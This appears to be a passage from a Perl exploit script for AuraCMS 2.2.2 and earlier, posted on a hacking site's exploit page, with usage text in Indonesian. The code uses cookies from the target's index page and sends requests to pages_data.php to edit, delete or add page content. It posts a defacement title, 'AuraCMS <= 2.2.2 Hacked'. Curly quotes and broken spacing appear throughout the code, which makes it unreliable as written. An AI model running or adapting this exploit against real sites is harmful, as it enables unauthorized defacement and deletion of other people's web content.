print “\ n ///////////////////////////////////////////////////////////”;
print “\ n [!] ”;
print “\ n [!] Penggunaan: perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]”;
print “\ n [!] Contoh : perl auracms_pagesdata.pl localhost /toko/ 1 - o 1 ";
print “\ n [!] Options: 1=Edit, 2=Delete, 3=Add”;
print “\ n”;
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $idhalaman = $ARGV[2];
my $isijudul = “AuraCMS <= 2.2.2 Hacked”;
my $isikonten = “Mohon Perhatian!!! terdapat kutu berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman”;
my $ambilkue = “http://”. $host.$path. “index.php”;
my $browser = LWP::UserAgent->new;
my $kue = HTTP::Cookies->new();
my $hasil = "";
%options = ();
GetOptions (\ %options, “o=i”,);
if ($options {“o”} && $options {“o”} == 1) {
$arbitrary = “http://”. $host.$path. “js/pages/pages_data.php? action=edit_saved&id=”;
}
if ($options {“o”} && $options {“o”} == 2) {
$arbitrary = “http://”. $host.$path. “js/pages/pages_data.php? action=delete&id=”;
}
if ($options {“o”} && $options {“o”} == 3) {
$arbitrary = “http://”. $host.$path. “js/pages/pages_data.php? action=add&id=”;
}
$hasil = $browser->get($arbitrary);
if (! $hasil->is_success) {
die (“[!] Gagal, berkas pages_data.php tidak tersedia \ n”);
}
# ambil kue dari website
$hasil = $browser->get($ambilkue);
$kue->extract_cookies($hasil);
$browser->cookie_jar($kue);
# arbitrary exploit
$arbitrary. = $idhalaman;
$hasil = $browser->post ($arbitrary, [“judul " =>$isijudul, “konten " =>$isikonten],);
$konten = $hasil->content;
print $konten;
Other pages: : <<Prev * 1 * 2
|
You are here: hacking technology
> Exploit
> Content
Category: Home
> Exploit